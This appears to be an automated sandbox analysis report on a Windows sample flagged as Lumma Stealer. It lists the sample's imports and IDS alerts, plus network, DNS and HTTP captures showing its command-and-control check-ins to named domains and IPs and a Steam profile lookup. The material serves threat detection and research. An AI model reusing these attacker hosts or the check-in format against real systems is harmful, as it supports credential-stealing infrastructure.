                                                                                                                                                                                                                                                  KERNEL32.dllGetComputerNameA, EnumCalendarInfoA, WriteConsoleInputW, TlsGetValue, SetComputerNameExA, InterlockedDecrement, GetCurrentProcess, GetLogicalDriveStringsW, InterlockedCompareExchange, WriteConsoleInputA, FreeEnvironmentStringsA, GetModuleHandleW, FindNextVolumeMountPointA, CancelDeviceWakeupRequest, EnumTimeFormatsA, LoadLibraryW, ReadConsoleInputA, GetCalendarInfoW, GetVersionExW, GetFileAttributesA, FindNextVolumeW, GetShortPathNameA, VerifyVersionInfoW, GetLastError, GetCurrentDirectoryW, SetLastError, GetProcAddress, VirtualAlloc, CreateJobSet, CopyFileA, SetFileAttributesA, GetTempFileNameA, GetAtomNameA, LoadLibraryA, InterlockedExchangeAdd, SetCalendarInfoW, OpenEventA, GetCommMask, EnumDateFormatsA, GlobalUnWire, GetDiskFreeSpaceExW, EnumCalendarInfoExA, LCMapStringW, GetVolumeInformationW, InterlockedIncrement, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, GetCPInfo, HeapAlloc, HeapCreate, VirtualFree, HeapReAlloc, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, ReadFile, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, SetFilePointer, CloseHandle, ExitProcess, WriteFile, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, GetStringTypeA, GetStringTypeW, InitializeCriticalSectionAndSpinCount, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetLocaleInfoW, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA
                                                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                  TamilIndia
                                                                                                                                                                                                                                                  TamilSri Lanka
                                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                  2024-12-17T08:14:00.587344+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.6577891.1.1.153UDP
                                                                                                                                                                                                                                                  2024-12-17T08:14:00.730618+01002058222ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)1192.168.2.6558501.1.1.153UDP
                                                                                                                                                                                                                                                  2024-12-17T08:14:01.739254+01002058222ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)1192.168.2.6558501.1.1.153UDP
                                                                                                                                                                                                                                                  2024-12-17T08:14:03.510446+01002058223ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)1192.168.2.649707178.62.201.34443TCP
                                                                                                                                                                                                                                                  2024-12-17T08:14:03.510446+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649707178.62.201.34443TCP
                                                                                                                                                                                                                                                  2024-12-17T08:14:03.514331+01002822521ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)1178.62.201.34443192.168.2.649707TCP
                                                                                                                                                                                                                                                  2024-12-17T08:14:04.152053+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649707178.62.201.34443TCP
                                                                                                                                                                                                                                                  2024-12-17T08:14:04.152053+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649707178.62.201.34443TCP
                                                                                                                                                                                                                                                  2024-12-17T08:14:04.220521+01002058214ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)1192.168.2.6557981.1.1.153UDP
                                                                                                                                                                                                                                                  2024-12-17T08:14:05.223602+01002058214ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)1192.168.2.6557981.1.1.153UDP
                                                                                                                                                                                                                                                  2024-12-17T08:14:06.990392+01002058215ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)1192.168.2.649709178.62.201.34443TCP
                                                                                                                                                                                                                                                  2024-12-17T08:14:06.990392+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649709178.62.201.34443TCP
                                                                                                                                                                                                                                                  2024-12-17T08:14:06.997138+01002822521ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)1178.62.201.34443192.168.2.649709TCP
                                                                                                                                                                                                                                                  2024-12-17T08:14:07.566782+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649709178.62.201.34443TCP
                                                                                                                                                                                                                                                  2024-12-17T08:14:07.566782+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649709178.62.201.34443TCP
                                                                                                                                                                                                                                                  2024-12-17T08:14:07.570159+01002058220ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)1192.168.2.6534371.1.1.153UDP
                                                                                                                                                                                                                                                  2024-12-17T08:14:07.711603+01002058218ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)1192.168.2.6586941.1.1.153UDP
                                                                                                                                                                                                                                                  2024-12-17T08:14:07.859906+01002058216ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)1192.168.2.6531581.1.1.153UDP
                                                                                                                                                                                                                                                  2024-12-17T08:14:08.000796+01002058236ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)1192.168.2.6646561.1.1.153UDP
                                                                                                                                                                                                                                                  2024-12-17T08:14:08.142354+01002058210ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)1192.168.2.6647941.1.1.153UDP
                                                                                                                                                                                                                                                  2024-12-17T08:14:08.288529+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.6541171.1.1.153UDP
                                                                                                                                                                                                                                                  2024-12-17T08:14:09.970138+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649716104.121.10.34443TCP
                                                                                                                                                                                                                                                  2024-12-17T08:14:10.793779+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.649716104.121.10.34443TCP
                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:02.039406061 CET49707443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:02.039464951 CET44349707178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:02.039563894 CET49707443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:02.043226004 CET49707443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:02.043242931 CET44349707178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:03.510304928 CET44349707178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:03.510446072 CET49707443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:03.514317989 CET49707443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:03.514331102 CET44349707178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:03.514686108 CET44349707178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:03.563549995 CET49707443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:03.563569069 CET49707443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:03.563755989 CET44349707178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:04.152126074 CET44349707178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:04.152350903 CET44349707178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:04.152441025 CET49707443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:04.171550989 CET49707443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:04.171567917 CET44349707178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:05.529133081 CET49709443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:05.529169083 CET44349709178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:05.529247046 CET49709443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:05.529577017 CET49709443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:05.529592037 CET44349709178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:06.990268946 CET44349709178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:06.990391970 CET49709443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:06.997117996 CET49709443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:06.997138023 CET44349709178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:06.997569084 CET44349709178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.001472950 CET49709443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.001544952 CET49709443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.001583099 CET44349709178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.566855907 CET44349709178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.567063093 CET44349709178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.567095995 CET49709443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.567142963 CET44349709178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.567154884 CET49709443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.567154884 CET49709443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.567162991 CET44349709178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.567176104 CET44349709178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:08.568459034 CET49716443192.168.2.6104.121.10.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:08.568569899 CET44349716104.121.10.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:08.568645954 CET49716443192.168.2.6104.121.10.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:08.568965912 CET49716443192.168.2.6104.121.10.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:08.569005013 CET44349716104.121.10.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:09.969866991 CET44349716104.121.10.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:09.970138073 CET49716443192.168.2.6104.121.10.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:09.971584082 CET49716443192.168.2.6104.121.10.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:09.971613884 CET44349716104.121.10.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:09.971935987 CET44349716104.121.10.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:09.973206997 CET49716443192.168.2.6104.121.10.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:10.015332937 CET44349716104.121.10.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:10.793804884 CET44349716104.121.10.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:10.793831110 CET44349716104.121.10.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:10.793873072 CET44349716104.121.10.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:10.794069052 CET49716443192.168.2.6104.121.10.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:10.794069052 CET49716443192.168.2.6104.121.10.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:10.794147968 CET44349716104.121.10.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:10.794228077 CET49716443192.168.2.6104.121.10.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:10.994167089 CET44349716104.121.10.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:10.994224072 CET44349716104.121.10.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:10.994419098 CET49716443192.168.2.6104.121.10.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:10.994419098 CET49716443192.168.2.6104.121.10.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:10.994493961 CET44349716104.121.10.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:10.994568110 CET49716443192.168.2.6104.121.10.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:11.002084017 CET44349716104.121.10.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:11.002173901 CET49716443192.168.2.6104.121.10.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:11.002209902 CET44349716104.121.10.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:11.002270937 CET49716443192.168.2.6104.121.10.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:11.002286911 CET44349716104.121.10.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:11.002322912 CET49716443192.168.2.6104.121.10.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:11.002342939 CET44349716104.121.10.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:11.002367020 CET49716443192.168.2.6104.121.10.34
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:11.002372026 CET44349716104.121.10.34192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:11.002402067 CET44349716104.121.10.34192.168.2.6
                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:00.587343931 CET5778953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:00.725835085 CET53577891.1.1.1192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:00.730618000 CET5585053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:01.739253998 CET5585053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:02.032973051 CET53558501.1.1.1192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:02.033041954 CET53558501.1.1.1192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:04.220520973 CET5579853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:05.223602057 CET5579853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:05.528218985 CET53557981.1.1.1192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:05.528285980 CET53557981.1.1.1192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.570158958 CET5343753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.708206892 CET53534371.1.1.1192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.711602926 CET5869453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.850552082 CET53586941.1.1.1192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.859905958 CET5315853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.998038054 CET53531581.1.1.1192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:08.000796080 CET6465653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:08.138926029 CET53646561.1.1.1192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:08.142354012 CET6479453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:08.285540104 CET53647941.1.1.1192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:08.288528919 CET5411753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:08.428651094 CET53541171.1.1.1192.168.2.6
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:08.430197001 CET6482653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:08.567424059 CET53648261.1.1.1192.168.2.6
                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:00.587343931 CET192.168.2.61.1.1.10xcbc6Standard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:00.730618000 CET192.168.2.61.1.1.10x1445Standard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:01.739253998 CET192.168.2.61.1.1.10x1445Standard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:04.220520973 CET192.168.2.61.1.1.10x3826Standard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:05.223602057 CET192.168.2.61.1.1.10x3826Standard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.570158958 CET192.168.2.61.1.1.10xa07Standard query (0)effecterectz.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.711602926 CET192.168.2.61.1.1.10xee28Standard query (0)diffuculttan.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.859905958 CET192.168.2.61.1.1.10xff08Standard query (0)debonairnukk.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:08.000796080 CET192.168.2.61.1.1.10x5c40Standard query (0)wrathful-jammy.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:08.142354012 CET192.168.2.61.1.1.10x99f1Standard query (0)awake-weaves.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:08.288528919 CET192.168.2.61.1.1.10x350fStandard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:08.430197001 CET192.168.2.61.1.1.10xf5f2Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:00.725835085 CET1.1.1.1192.168.2.60xcbc6Name error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:02.032973051 CET1.1.1.1192.168.2.60x1445No error (0)immureprech.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:02.032973051 CET1.1.1.1192.168.2.60x1445No error (0)immureprech.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:02.032973051 CET1.1.1.1192.168.2.60x1445No error (0)immureprech.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:02.033041954 CET1.1.1.1192.168.2.60x1445No error (0)immureprech.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:02.033041954 CET1.1.1.1192.168.2.60x1445No error (0)immureprech.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:02.033041954 CET1.1.1.1192.168.2.60x1445No error (0)immureprech.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:05.528218985 CET1.1.1.1192.168.2.60x3826No error (0)deafeninggeh.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:05.528218985 CET1.1.1.1192.168.2.60x3826No error (0)deafeninggeh.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:05.528218985 CET1.1.1.1192.168.2.60x3826No error (0)deafeninggeh.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:05.528285980 CET1.1.1.1192.168.2.60x3826No error (0)deafeninggeh.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:05.528285980 CET1.1.1.1192.168.2.60x3826No error (0)deafeninggeh.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:05.528285980 CET1.1.1.1192.168.2.60x3826No error (0)deafeninggeh.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.708206892 CET1.1.1.1192.168.2.60xa07Name error (3)effecterectz.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.850552082 CET1.1.1.1192.168.2.60xee28Name error (3)diffuculttan.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:07.998038054 CET1.1.1.1192.168.2.60xff08Name error (3)debonairnukk.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:08.138926029 CET1.1.1.1192.168.2.60x5c40Name error (3)wrathful-jammy.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:08.285540104 CET1.1.1.1192.168.2.60x99f1Name error (3)awake-weaves.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:08.428651094 CET1.1.1.1192.168.2.60x350fName error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Dec 17, 2024 08:14:08.567424059 CET1.1.1.1192.168.2.60xf5f2No error (0)steamcommunity.com104.121.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  • immureprech.biz
                                                                                                                                                                                                                                                  • deafeninggeh.biz
                                                                                                                                                                                                                                                  • steamcommunity.com
                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  0192.168.2.649707178.62.201.344435924C:\Users\user\Desktop\N1sb7Ii2YD.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 07:14:03 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 8
                                                                                                                                                                                                                                                  Host: immureprech.biz
                                                                                                                                                                                                                                                  2024-12-17 07:14:03 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                  Data Ascii: act=life
                                                                                                                                                                                                                                                  2024-12-17 07:14:04 UTC94INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 07:14:03 GMT
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  1192.168.2.649709178.62.201.344435924C:\Users\user\Desktop\N1sb7Ii2YD.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 07:14:06 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 8
                                                                                                                                                                                                                                                  Host: deafeninggeh.biz
                                                                                                                                                                                                                                                  2024-12-17 07:14:06 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                  Data Ascii: act=life
                                                                                                                                                                                                                                                  2024-12-17 07:14:07 UTC94INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 07:14:07 GMT
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  2192.168.2.649716104.121.10.344435924C:\Users\user\Desktop\N1sb7Ii2YD.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 07:14:09 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                                                                                                  2024-12-17 07:14:10 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 07:14:10 GMT
                                                                                                                                                                                                                                                  Content-Length: 35131
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: sessionid=a10347265d7f44e60a1df39f; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
